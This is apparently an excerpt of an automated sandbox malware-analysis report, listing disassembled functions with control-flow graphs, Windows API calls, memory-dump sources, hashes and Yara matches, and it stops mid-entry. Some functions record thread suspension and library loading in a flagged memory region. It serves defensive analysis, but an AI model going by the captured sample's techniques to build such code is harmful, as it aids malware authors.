                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocErrorLastSleepVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2288223010-0
                                                                                                                        • Opcode ID: 0d06327de0ecb5ea6dcb9e6450919807fe3be375993fd709472d07e39047ea63
                                                                                                                        • Instruction ID: 1c96bc254db2bba3be362c74b9ffdcc8534d18a638db5fd6e94cb72665b0989f
                                                                                                                        • Opcode Fuzzy Hash: 0d06327de0ecb5ea6dcb9e6450919807fe3be375993fd709472d07e39047ea63
                                                                                                                        • Instruction Fuzzy Hash: 2851313025960AEFDF251FB2DC0DA7A3B69FB41366F244528F70AD50A0EB318951EF51
                                                                                                                        Function 008F6210 Relevance: 16.8, APIs: 9, Strings: 2, Instructions: 337COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 439 8f6210-8f6225 VirtualFree 440 8f6227-8f6232 439->440 441 8f6233-8f6258 439->441 442 8f625e-8f6264 441->442 443 8f62fc-8f62fd 441->443 445 8f628f-8f6294 442->445 446 8f636f 442->446 447 8f629b-8f62a3 call 8f5fb0 442->447 448 8f626b-8f6270 442->448 449 8f664b-8f6653 442->449 450 8f6368-8f636d 442->450 451 8f6357-8f635c 442->451 452 8f6296 442->452 453 8f6374-8f6381 call 8f5fb0 442->453 454 8f6272-8f6281 VirtualFree 442->454 444 8f62ff-8f6300 443->444 457 8f6302-8f6305 444->457 445->447 446->453 462 8f62a8-8f62ad 447->462 448->447 460 8f6661-8f6672 call 8f5fb0 449->460 450->453 451->453 452->447 464 8f6386-8f638d 453->464 455 8f62af-8f62bf call 900685 454->455 456 8f6283-8f628b GetLastError 454->456 456->455 461 8f628d 456->461 457->451 468 8f638f-8f63a1 460->468 477 8f6678 460->477 461->457 462->455 466 8f62c0-8f62cb GetLastError 462->466 464->468 469 8f63ce-8f63e1 GetLastError 464->469 473 8f62cd-8f62d2 466->473 474 8f62da-8f62f7 call 8c9850 call 8c9830 466->474 475 8f6489-8f6492 468->475 476 8f63a7-8f63ba VirtualFree 468->476 471 8f63e7-8f63f6 469->471 472 8f6621-8f662f call 931ad0 469->472 483 8f640e-8f6419 471->483 484 8f63f8-8f6400 471->484 520 8f66e1-8f6704 call 8f6310 472->520 526 8f6635-8f663d 472->526 473->474 480 8f62d4-8f62d6 473->480 474->443 481 8f66db-8f66dc 476->481 482 8f63c0-8f63cc 476->482 478 8f647b-8f6487 GetLastError 477->478 478->475 480->455 518 8f62d8 480->518 486 8f66de-8f66df 481->486 482->471 497 8f641b-8f6420 483->497 517 8f642c-8f643c call 8f5fb0 483->517 487 8f65cd-8f65d2 484->487 488 8f64cd-8f64d2 484->488 489 8f678a-8f6797 call 8f5fb0 484->489 490 8f6589-8f659c call 8f5fb0 484->490 491 8f6407-8f640c 484->491 492 8f64c6-8f64cb 484->492 493 8f6785 484->493 494 8f6504-8f6515 call 8f5fb0 484->494 495 8f6584 484->495 496 8f669d-8f66a5 484->496 484->497 498 8f64d9-8f64ea call 8f5fb0 484->498 499 8f6696-8f669b 484->499 500 8f64d4 484->500 501 8f6493-8f649b 484->501 502 8f676f-8f677c VirtualFree 484->502 503 8f66ae 484->503 504 8f6768-8f676d 484->504 505 8f6427 484->505 506 8f66a7-8f66ac 484->506 507 8f65e7-8f65ef 484->507 508 8f6422-8f6425 484->508 509 8f64ff 484->509 510 8f677e-8f6783 484->510 511 8f657d-8f6582 484->511 512 8f64f8-8f64fd 484->512 513 8f6576-8f657b 484->513 514 8f66b3-8f66c4 call 8f5fb0 484->514 486->520 487->494 488->498 527 8f679a-8f67a0 489->527 545 8f659e-8f65a0 490->545 546 8f65d7-8f65e5 GetLastError 490->546 491->517 492->498 493->489 543 8f6517-8f653b 494->543 544 8f649d-8f64b4 GetLastError call 931ad0 494->544 495->490 496->514 497->517 542 8f64ec 498->542 498->543 499->514 500->498 501->498 502->527 503->514 504->489 505->517 506->514 507->490 508->517 509->494 510->489 511->490 512->494 513->490 539 8f6442-8f6454 514->539 547 8f66ca 514->547 517->539 540 8f65f1-8f6602 GetLastError 517->540 518->444 551 8f6709-8f670d 520->551 526->449 526->460 526->487 526->488 526->489 526->490 526->491 526->492 526->493 526->494 526->495 526->496 526->497 526->498 526->499 526->500 526->501 526->502 526->503 526->504 526->505 526->506 526->507 526->508 526->509 526->510 526->511 526->512 526->513 526->514 535 8f6644-8f6649 526->535 536 8f665c 526->536 537 8f6655-8f665a 526->537 535->449 535->460 536->460 537->460 539->475 553 8f6456-8f6466 VirtualFree 539->553 549 8f667d-8f6688 call 931ad0 540->549 550 8f6604-8f6613 540->550 542->478 543->475 554 8f6541-8f6551 VirtualFree 543->554 565 8f64ba-8f64bf 544->565 566 8f66d8-8f66d9 544->566 548 8f65a7-8f65af 545->548 546->507 546->548 547->478 548->475 560 8f65b5-8f65bb 548->560 549->520 569 8f668a-8f668f 549->569 550->486 561 8f6619-8f661f 550->561 551->504 553->481 556 8f646c-8f6476 553->556 558 8f66cf-8f66d0 554->558 559 8f6557-8f6564 554->559 556->550 567 8f66d2-8f66d6 558->567 559->567 568 8f656a-8f656f 559->568 563 8f64ee-8f64f6 560->563 564 8f65c1-8f65c6 560->564 561->560 563->494 563->512 564->487 564->488 564->489 564->490 564->492 564->493 564->494 564->495 564->498 564->500 564->501 564->502 564->504 564->507 564->509 564->510 564->511 564->512 564->513 565->488 565->489 565->490 565->492 565->493 565->495 565->498 565->500 565->501 565->502 565->504 565->507 565->510 565->511 565->513 566->481 567->566 568->489 568->490 568->493 568->495 568->502 568->504 568->507 568->510 568->511 568->513 569->487 569->488 569->489 569->490 569->492 569->493 569->494 569->495 569->496 569->498 569->499 569->500 569->501 569->502 569->503 569->504 569->506 569->507 569->509 569->510 569->511 569->512 569->513 569->514
                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,008F495E,008F56C4,?,?,008F5F3D,00000002,00000000,?,?,00000000,?,?), ref: 008F621D
                                                                                                                        Strings
                                                                                                                        • SetSystemPagesAccessInternal, xrefs: 008F62E7
                                                                                                                        • page_allocator_internals_win.h, xrefs: 008F62E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID: SetSystemPagesAccessInternal$page_allocator_internals_win.h
                                                                                                                        • API String ID: 1263568516-1640390853
                                                                                                                        • Opcode ID: b715aa8ba6fb8c48004b5768ffecc4e745a35a9c19aeaccf151b9fa2bffd5346
                                                                                                                        • Instruction ID: ed9d95f9ae49529209b1c2f073d649fb71037c7fd2234ddefc9376776e89e6d2
                                                                                                                        • Opcode Fuzzy Hash: b715aa8ba6fb8c48004b5768ffecc4e745a35a9c19aeaccf151b9fa2bffd5346
                                                                                                                        • Instruction Fuzzy Hash: FCA1E571A0820DEBEB189B79DC55B3A7369FB50309F144229F70ADB2C1FA34DD209B95
                                                                                                                        Function 008F6310 Relevance: 11.6, APIs: 9, Instructions: 351COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 954 8f6310-8f6326 955 8f6328 call 8f8780 954->955 956 8f6337-8f633a 954->956 960 8f632d-8f6334 955->960 958 8f66d5-8f66d6 956->958 959 8f6340-8f6349 956->959 963 8f66d8-8f66d9 958->963 961 8f635e-8f6366 959->961 962 8f634b-8f6350 959->962 960->956 984 8f6368-8f636d 961->984 994 8f6374-8f6381 call 8f5fb0 961->994 964 8f65cd-8f65d2 962->964 965 8f64cd-8f64d2 962->965 966 8f664b-8f6653 962->966 967 8f6589-8f659c call 8f5fb0 962->967 968 8f6407-8f640c 962->968 969 8f64c6-8f64cb 962->969 970 8f6644-8f6649 962->970 971 8f6504-8f6515 call 8f5fb0 962->971 972 8f6584 962->972 973 8f669d-8f66a5 962->973 974 8f665c 962->974 975 8f641b-8f6420 962->975 976 8f64d9-8f64ea call 8f5fb0 962->976 977 8f6357-8f635c 962->977 978 8f6696-8f669b 962->978 979 8f6655-8f665a 962->979 980 8f64d4 962->980 981 8f6493-8f649b 962->981 982 8f636f 962->982 983 8f66ae 962->983 962->984 985 8f6427 962->985 986 8f66a7-8f66ac 962->986 987 8f65e7-8f65ef 962->987 988 8f6422-8f6425 962->988 989 8f6661-8f6672 call 8f5fb0 962->989 990 8f64ff 962->990 991 8f657d-8f6582 962->991 992 8f64f8-8f64fd 962->992 993 8f6576-8f657b 962->993 962->994 995 8f66b3-8f66c4 call 8f5fb0 962->995 996 8f66db-8f66dc 963->996 964->971 965->976 966->989 1018 8f659e-8f65a0 967->1018 1019 8f65d7-8f65e5 GetLastError 967->1019 997 8f642c-8f643c call 8f5fb0 968->997 969->976 970->966 970->989 1016 8f6517-8f653b 971->1016 1017 8f649d-8f64b4 GetLastError call 931ad0 971->1017 972->967 973->995 974->989 975->997 1015 8f64ec 976->1015 976->1016 977->994 978->995 979->989 980->976 981->976 982->994 983->995 984->994 985->997 986->995 987->967 988->997 1020 8f638f-8f63a1 989->1020 1021 8f6678 989->1021 990->971 991->967 992->971 993->967 1011 8f6386-8f638d 994->1011 1022 8f66ca 995->1022 1023 8f6442-8f6454 995->1023 998 8f66de-8f66df 996->998 997->1023 1031 8f65f1-8f6602 GetLastError 997->1031 1005 8f66e1-8f6704 call 8f6310 998->1005 1037 8f6709-8f670d 1005->1037 1011->1020 1024 8f63ce-8f63e1 GetLastError 1011->1024 1025 8f647b-8f6487 GetLastError 1015->1025 1032 8f6489-8f6492 1016->1032 1034 8f6541-8f6551 VirtualFree 1016->1034 1017->963 1056 8f64ba-8f64bf 1017->1056 1026 8f65a7-8f65af 1018->1026 1019->987 1019->1026 1020->1032 1035 8f63a7-8f63ba VirtualFree 1020->1035 1021->1025 1022->1025 1023->1032 1033 8f6456-8f6466 VirtualFree 1023->1033 1029 8f63e7-8f63f6 1024->1029 1030 8f6621-8f662f call 931ad0 1024->1030 1025->1032 1026->1032 1041 8f65b5-8f65bb 1026->1041 1046 8f640e-8f6419 1029->1046 1047 8f63f8-8f6400 1029->1047 1030->1005 1062 8f6635-8f663d 1030->1062 1042 8f667d-8f6688 call 931ad0 1031->1042 1043 8f6604-8f6613 1031->1043 1033->996 1036 8f646c-8f6476 1033->1036 1039 8f66cf-8f66d0 1034->1039 1040 8f6557-8f6564 1034->1040 1035->996 1045 8f63c0-8f63cc 1035->1045 1036->1043 1051 8f6768-8f676d 1037->1051 1059 8f66d2-8f66d3 1039->1059 1040->1059 1060 8f656a-8f656f 1040->1060 1054 8f64ee-8f64f6 1041->1054 1055 8f65c1-8f65c6 1041->1055 1042->1005 1065 8f668a-8f668f 1042->1065 1043->998 1058 8f6619-8f661f 1043->1058 1045->1029 1046->975 1046->997 1047->964 1047->965 1047->967 1047->968 1047->969 1047->971 1047->972 1047->973 1047->975 1047->976 1047->978 1047->980 1047->981 1047->983 1047->985 1047->986 1047->987 1047->988 1047->990 1047->991 1047->992 1047->993 1047->995 1048 8f678a-8f6797 call 8f5fb0 1047->1048 1049 8f6785 1047->1049 1050 8f676f-8f677c VirtualFree 1047->1050 1047->1051 1052 8f677e-8f6783 1047->1052 1063 8f679a-8f67a0 1048->1063 1049->1048 1050->1063 1051->1048 1052->1048 1054->971 1054->992 1055->964 1055->965 1055->967 1055->969 1055->971 1055->972 1055->976 1055->980 1055->981 1055->987 1055->990 1055->991 1055->992 1055->993 1055->1048 1055->1049 1055->1050 1055->1051 1055->1052 1056->965 1056->967 1056->969 1056->972 1056->976 1056->980 1056->981 1056->987 1056->991 1056->993 1056->1048 1056->1049 1056->1050 1056->1051 1056->1052 1058->1041 1059->958 1060->967 1060->972 1060->987 1060->991 1060->993 1060->1048 1060->1049 1060->1050 1060->1051 1060->1052 1062->964 1062->965 1062->966 1062->967 1062->968 1062->969 1062->970 1062->971 1062->972 1062->973 1062->974 1062->975 1062->976 1062->978 1062->979 1062->980 1062->981 1062->983 1062->985 1062->986 1062->987 1062->988 1062->989 1062->990 1062->991 1062->992 1062->993 1062->995 1062->1048 1062->1049 1062->1050 1062->1051 1062->1052 1065->964 1065->965 1065->967 1065->969 1065->971 1065->972 1065->973 1065->976 1065->978 1065->980 1065->981 1065->983 1065->986 1065->987 1065->990 1065->991 1065->992 1065->993 1065->995 1065->1048 1065->1049 1065->1050 1065->1051 1065->1052
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008F8780: GetCurrentProcess.KERNEL32(?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8795
                                                                                                                          • Part of subcall function 008F8780: IsWow64Process.KERNEL32(00000000,00963608,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F87A1
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,00000000,?,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000), ref: 008F5FCA
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F5FE7
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 008F63B2
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6005
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6013
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6022
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F603C
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F604A
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6054
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F606E
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F607C
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6086
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60A4
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60B2
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60C0
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60DE
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60EC
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60FA
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6118
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6126
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6134
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6152
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6160
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F616E
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,?), ref: 008F63D1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 008F6549
                                                                                                                        • GetLastError.KERNEL32 ref: 008F65D7
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 008F645E
                                                                                                                          • Part of subcall function 00931AD0: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,?,008F6626,?,?,?,?,?,00000000,00000000,?,?,?), ref: 00931ADB
                                                                                                                          • Part of subcall function 00931AD0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,008F6626,?,?,?,?,?,00000000,00000000,?,?,?), ref: 00931B07
                                                                                                                          • Part of subcall function 00931AD0: ReleaseSRWLockExclusive.KERNEL32(00972AD0,?,008F6626,?,?,?,?,?,00000000,00000000,?,?,?), ref: 00931B2E
                                                                                                                        • GetLastError.KERNEL32 ref: 008F647B
                                                                                                                        • GetLastError.KERNEL32 ref: 008F649D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 008F65F1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000040,00004000), ref: 008F6776
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastVirtual$Alloc$Sleep$Free$ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 264247703-0
                                                                                                                        • Opcode ID: 18e3dd91e0a0fc20d94d6b02e21c215f6e444be51b1160288adc42477072713b
                                                                                                                        • Instruction ID: 7953b99f2fbbc8f8e9383fbd5ec51bf9792d5278fd0f0bb5954f16e8628cc709
                                                                                                                        • Opcode Fuzzy Hash: 18e3dd91e0a0fc20d94d6b02e21c215f6e444be51b1160288adc42477072713b
                                                                                                                        • Instruction Fuzzy Hash: 2BB1F471A1820EDBEB189F39DC55B3A7369FB50309F144229FB06DB281FA34DD209B95
                                                                                                                        Function 008F4FB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1384 8f4fb0-8f4ff9 call 920950 call 8e66e0 1389 8f500e-8f502d 1384->1389 1390 8f4ffb-8f5000 1384->1390 1391 8f5030-8f508f 1389->1391 1392 8f50ad-8f50ae 1390->1392 1393 8f5006-8f5009 1390->1393 1391->1391 1396 8f5091-8f5095 1391->1396 1395 8f50b0-8f50d5 call 8e66e0 1392->1395 1394 8f509d-8f50aa 1393->1394 1401 8f50d7-8f50db 1395->1401 1402 8f50e3-8f50e5 1395->1402 1396->1395 1398 8f5097-8f509a 1396->1398 1398->1394 1404 8f50ed-8f50ef call 8e66e0 1401->1404 1405 8f50dd-8f50e1 1401->1405 1403 8f50f9-8f5102 1402->1403 1408 8f50f4-8f50f7 1404->1408 1407 8f5152-8f5162 1405->1407 1409 8f513a-8f513c 1407->1409 1410 8f5164-8f516a 1407->1410 1408->1403 1411 8f512c-8f5138 1409->1411 1412 8f514a 1409->1412 1413 8f516c-8f516e 1410->1413 1414 8f5113-8f5115 1410->1414 1411->1412 1415 8f514c-8f5150 1412->1415 1413->1414 1418 8f5170-8f519e 1413->1418 1416 8f5117-8f511e 1414->1416 1417 8f5103-8f5107 1414->1417 1415->1407 1421 8f50e7-8f50eb 1415->1421 1422 8f5123-8f512a 1416->1422 1423 8f5120 1416->1423 1419 8f510f-8f5111 1417->1419 1420 8f5109-8f510c 1417->1420 1424 8f51b0-8f51b3 1418->1424 1425 8f51a0-8f51ae 1418->1425 1419->1408 1420->1419 1421->1404 1421->1408 1422->1415 1423->1422 1425->1415
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv
                                                                                                                        • String ID: first$size$span$span
                                                                                                                        • API String ID: 3732870572-3774232114
                                                                                                                        • Opcode ID: 37cd1447138b38f206c2d3c7681c37284500a5bf9bc6a080b0c13de6369c2e5d
                                                                                                                        • Instruction ID: b6c866705dde0453f64be5db7c1979ab1d1bdc73b4b88f9097ec8f379c15fa12
                                                                                                                        • Opcode Fuzzy Hash: 37cd1447138b38f206c2d3c7681c37284500a5bf9bc6a080b0c13de6369c2e5d
                                                                                                                        • Instruction Fuzzy Hash: 9721F6B2D01A194FC706CF36C851366BBA9FFD5390F108726ED54E3750E73199928AD0
                                                                                                                        Function 05940BAB Relevance: 7.6, APIs: 5, Instructions: 100threadprocessCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1426 5940bab-5940bf2 CreateToolhelp32Snapshot 1429 5940cc8-5940ccb 1426->1429 1430 5940bf8-5940c19 Thread32First 1426->1430 1431 5940cb4-5940cc6 FindCloseChangeNotification 1430->1431 1432 5940c1f-5940c25 1430->1432 1431->1429 1433 5940c94-5940cae 1432->1433 1434 5940c27-5940c2d 1432->1434 1433->1431 1433->1432 1434->1433 1435 5940c2f-5940c4e 1434->1435 1435->1433 1438 5940c50-5940c54 1435->1438 1439 5940c56-5940c6a Wow64SuspendThread 1438->1439 1440 5940c6c-5940c7b 1438->1440 1441 5940c80-5940c92 FindCloseChangeNotification 1439->1441 1440->1441 1441->1433
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,059406F1,?,00000001,?,81EC8B55,000000FF), ref: 05940BE9
                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 05940C15
                                                                                                                        • Wow64SuspendThread.KERNEL32(00000000), ref: 05940C68
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 05940C92
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 05940CC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1145194703-0
                                                                                                                        • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                        • Instruction ID: 254e131e8ba34e2c8f1993887f5cfe126505313bcfc9ff6bed80890aa4aab814
                                                                                                                        • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                        • Instruction Fuzzy Hash: D541D975A04108EFDB18DF98C894FADB7FAEF88300F108168E6159F794DA34AE45CB94
                                                                                                                        Function 059A1705 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1529 59a1705-59a1718 1530 59a171a-59a171d 1529->1530 1531 59a1730-59a173a 1529->1531 1532 59a171f-59a1722 1530->1532 1533 59a1749-59a1755 1531->1533 1534 59a173c-59a1744 1531->1534 1532->1531 1536 59a1724-59a172e 1532->1536 1535 59a1758-59a175d 1533->1535 1534->1533 1537 59a175f-59a176a 1535->1537 1538 59a1790-59a1797 LoadLibraryA 1535->1538 1536->1531 1536->1532 1539 59a176c-59a1784 call 59a1dd3 1537->1539 1540 59a1786-59a178a 1537->1540 1541 59a179a-59a179e 1538->1541 1539->1540 1545 59a179f-59a17a1 1539->1545 1540->1535 1543 59a178c-59a178e 1540->1543 1543->1538 1543->1541 1545->1541
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?), ref: 059A1797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: .dll
                                                                                                                        • API String ID: 1029625771-2738580789
                                                                                                                        • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                        • Instruction ID: e8cff01822b293b0c311000bb28da3ca0398498c3f4689db635710ceaf47a4da
